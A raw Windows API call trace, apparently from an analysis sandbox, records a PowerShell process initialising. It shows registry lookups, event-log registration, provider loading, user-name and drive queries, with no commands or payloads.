	[0671.277] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d238 | out: phkResult=0x26d238*=0x36c) returned 0x0
	[0671.277] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d238 | out: phkResult=0x26d238*=0x0) returned 0x2
	[0671.277] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d238 | out: phkResult=0x26d238*=0x390) returned 0x0
	[0671.277] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d238 | out: phkResult=0x26d238*=0x0) returned 0x2
	[0671.277] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d238 | out: phkResult=0x26d238*=0x394) returned 0x0
	[0671.278] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d238 | out: phkResult=0x26d238*=0x0) returned 0x2
	[0671.278] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d238 | out: phkResult=0x26d238*=0x398) returned 0x0
	[0671.278] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d238 | out: phkResult=0x26d238*=0x0) returned 0x2
	[0671.278] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d238 | out: phkResult=0x26d238*=0x39c) returned 0x0
	[0671.278] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d238 | out: phkResult=0x26d238*=0x0) returned 0x2
	[0671.278] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d238 | out: phkResult=0x26d238*=0x3a0) returned 0x0
	[0671.279] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d238 | out: phkResult=0x26d238*=0x0) returned 0x2
	[0671.279] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d238 | out: phkResult=0x26d238*=0x3a4) returned 0x0
	[0671.279] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d238 | out: phkResult=0x26d238*=0x0) returned 0x2
	[0671.279] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d238 | out: phkResult=0x26d238*=0x3a8) returned 0x0
	[0671.279] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d238 | out: phkResult=0x26d238*=0x0) returned 0x2
	[0671.279] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d238 | out: phkResult=0x26d238*=0x3ac) returned 0x0
	[0671.279] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d238 | out: phkResult=0x26d238*=0x3b0) returned 0x0
	[0671.279] RegCloseKey (hKey=0x3b0) returned 0x0
	[0671.280] RegCloseKey (hKey=0x38c) returned 0x0
	[0671.280] RegCloseKey (hKey=0x3ac) returned 0x0
	[0671.285] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x28a0008
	[0672.772] ReportEventW (hEventLog=0x28a0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x30c7af8*="WSMan", lpRawData=0x30c7868) returned 1
	[0672.773] CoTaskMemAlloc (cb=0x104) returned 0x44be40
	[0672.773] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44be40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0672.773] CoTaskMemFree (pv=0x44be40) 
	[0672.775] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0672.775] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0672.775] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0672.776] CoTaskMemAlloc (cb=0x804) returned 0x1ba762d0
	[0672.776] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1ba762d0, nSize=0x26d4c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x26d4c8) returned 0x1
	[0672.776] CoTaskMemFree (pv=0x1ba762d0) 
	[0672.776] CoTaskMemAlloc (cb=0x204) returned 0x3d5480
	[0672.776] GetUserNameW (in: lpBuffer=0x3d5480, pcbBuffer=0x26d508 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x26d508) returned 1
	[0672.776] CoTaskMemFree (pv=0x3d5480) 
	[0672.777] ReportEventW (hEventLog=0x28a0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x30cd030*="Alias", lpRawData=0x30ccdc0) returned 1
	[0672.778] CoTaskMemAlloc (cb=0x104) returned 0x44be40
	[0672.778] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44be40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0672.778] CoTaskMemFree (pv=0x44be40) 
	[0672.782] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0672.782] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0672.782] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0672.782] CoTaskMemAlloc (cb=0x804) returned 0x1ba762d0
	[0672.782] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1ba762d0, nSize=0x26d4c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x26d4c8) returned 0x1
	[0672.783] CoTaskMemFree (pv=0x1ba762d0) 
	[0672.783] CoTaskMemAlloc (cb=0x204) returned 0x3d5480
	[0672.783] GetUserNameW (in: lpBuffer=0x3d5480, pcbBuffer=0x26d508 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x26d508) returned 1
	[0672.783] CoTaskMemFree (pv=0x3d5480) 
	[0672.784] ReportEventW (hEventLog=0x28a0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x30d2628*="Environment", lpRawData=0x30d23b8) returned 1
	[0672.785] CoTaskMemAlloc (cb=0x104) returned 0x44be40
	[0672.785] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44be40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0672.785] CoTaskMemFree (pv=0x44be40) 
	[0672.786] CoTaskMemAlloc (cb=0x104) returned 0x44be40
	[0672.786] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x44be40, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0672.786] CoTaskMemFree (pv=0x44be40) 
	[0672.786] CoTaskMemAlloc (cb=0x104) returned 0x44be40
	[0672.786] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x44be40, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0672.786] CoTaskMemFree (pv=0x44be40) 
	[0672.787] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x26d070, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0672.787] SetErrorMode (uMode=0x1) returned 0x1
	[0672.787] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x26d280 | out: lpFileInformation=0x26d280*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0672.787] SetErrorMode (uMode=0x1) returned 0x1
	[0672.789] GetLogicalDrives () returned 0x4
	[0672.789] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x26cde0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0672.790] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0672.790] SetErrorMode (uMode=0x1) returned 0x1
	[0672.791] CoTaskMemAlloc (cb=0x68) returned 0x1ba35890
	[0672.791] CoTaskMemAlloc (cb=0x68) returned 0x1ba35d60
	[0672.791] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1ba35890, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x26d250, lpMaximumComponentLength=0x26d24c, lpFileSystemFlags=0x26d248, lpFileSystemNameBuffer=0x1ba35d60, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x26d250*=0x9c354b42, lpMaximumComponentLength=0x26d24c*=0xff, lpFileSystemFlags=0x26d248*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0672.792] CoTaskMemFree (pv=0x1ba35890) 
	[0672.792] CoTaskMemFree (pv=0x1ba35d60) 
	[0672.792] SetErrorMode (uMode=0x1) returned 0x1
	[0672.792] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0672.793] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x26cf90, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0672.793] SetErrorMode (uMode=0x1) returned 0x1
	[0672.793] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x26d1f0 | out: lpFileInformation=0x26d1f0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0672.793] SetErrorMode (uMode=0x1) returned 0x1
	[0672.794] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x26cf90, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0672.794] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x26ce40, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0672.794] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0672.794] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x26cd70, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0672.794] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0672.795] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x26cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0672.795] SetErrorMode (uMode=0x1) returned 0x1
	[0672.795] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x26d020 | out: lpFileInformation=0x26d020*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0672.795] SetErrorMode (uMode=0x1) returned 0x1
	[0672.796] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x26cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0672.796] SetErrorMode (uMode=0x1) returned 0x1
	[0672.796] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x26d020 | out: lpFileInformation=0x26d020*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0672.796] SetErrorMode (uMode=0x1) returned 0x1
	[0672.796] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x26ce60, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0672.796] SetErrorMode (uMode=0x1) returned 0x1
	[0672.796] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x26d0c0 | out: lpFileInformation=0x26d0c0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0672.796] SetErrorMode (uMode=0x1) returned 0x1
	[0672.800] CoTaskMemAlloc (cb=0x804) returned 0x1ba762d0
	[0672.800] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1ba762d0, nSize=0x26d4c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x26d4c8) returned 0x1
	[0672.800] CoTaskMemFree (pv=0x1ba762d0) 
	[0672.800] CoTaskMemAlloc (cb=0x204) returned 0x3d5480
	[0672.800] GetUserNameW (in: lpBuffer=0x3d5480, pcbBuffer=0x26d508 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x26d508) returned 1
	[0672.801] CoTaskMemFree (pv=0x3d5480) 
	[0672.801] ReportEventW (hEventLog=0x28a0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x30d9718*="FileSystem", lpRawData=0x30d94a8) returned 1
	[0672.802] CoTaskMemAlloc (cb=0x104) returned 0x44be40
	[0672.803] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44be40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0672.803] CoTaskMemFree (pv=0x44be40) 
	[0672.804] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0672.804] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26ccf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0672.804] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26ccf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0672.805] CoTaskMemAlloc (cb=0x804) returned 0x1ba762d0
	[0672.805] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1ba762d0, nSize=0x26d4c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x26d4c8) returned 0x1
	[0674.298] CoTaskMemFree (pv=0x1ba762d0) 
	[0674.298] CoTaskMemAlloc (cb=0x204) returned 0x3d5480
	[0674.298] GetUserNameW (in: lpBuffer=0x3d5480, pcbBuffer=0x26d508 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x26d508) returned 1
	[0674.298] CoTaskMemFree (pv=0x3d5480) 
	[0674.299] ReportEventW (hEventLog=0x28a0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x30def58*="Function", lpRawData=0x30dece8) returned 1
	[0674.646] CoTaskMemAlloc (cb=0x104) returned 0x44be40
	[0674.646] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44be40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0674.646] CoTaskMemFree (pv=0x44be40) 
	[0674.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0674.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0674.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0674.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0674.687] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0676.328] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0676.328] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0676.330] CoTaskMemAlloc (cb=0x804) returned 0x1ba762d0
	[0676.330] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1ba762d0, nSize=0x26d4c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x26d4c8) returned 0x1
	[0676.331] CoTaskMemFree (pv=0x1ba762d0) 
	[0676.331] CoTaskMemAlloc (cb=0x204) returned 0x3d5480
	[0676.331] GetUserNameW (in: lpBuffer=0x3d5480, pcbBuffer=0x26d508 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x26d508) returned 1
	[0676.331] CoTaskMemFree (pv=0x3d5480) 
	[0676.332] ReportEventW (hEventLog=0x28a0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3101780*="Registry", lpRawData=0x3101510) returned 1
	[0678.149] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0678.149] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0678.149] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0678.149] CoTaskMemAlloc (cb=0x804) returned 0x1ba762d0
	[0678.150] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1ba762d0, nSize=0x26d4c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x26d4c8) returned 0x1
	[0678.150] CoTaskMemFree (pv=0x1ba762d0) 
	[0678.150] CoTaskMemAlloc (cb=0x204) returned 0x3d5480
	[0678.150] GetUserNameW (in: lpBuffer=0x3d5480, pcbBuffer=0x26d508 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x26d508) returned 1
	[0678.150] CoTaskMemFree (pv=0x3d5480) 
	[0678.151] ReportEventW (hEventLog=0x28a0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3106b98*="Variable", lpRawData=0x3106928) returned 1
	[0678.200] CoTaskMemAlloc (cb=0x104) returned 0x44be40
	[0678.200] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44be40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0678.200] CoTaskMemFree (pv=0x44be40) 
	[0678.203] CoTaskMemAlloc (cb=0x104) returned 0x44be40
	[0678.203] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44be40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0678.204] CoTaskMemFree (pv=0x44be40) 
	[0678.206] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x26cd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0678.206] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x26ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0678.206] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x26ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0678.207] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x26ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0680.082] CoTaskMemAlloc (cb=0x804) returned 0x1ba7fd40
	[0680.082] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1ba7fd40, nSize=0x26d4c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x26d4c8) returned 0x1
	[0680.083] CoTaskMemFree (pv=0x1ba7fd40) 
	[0680.083] CoTaskMemAlloc (cb=0x204) returned 0x3d5480
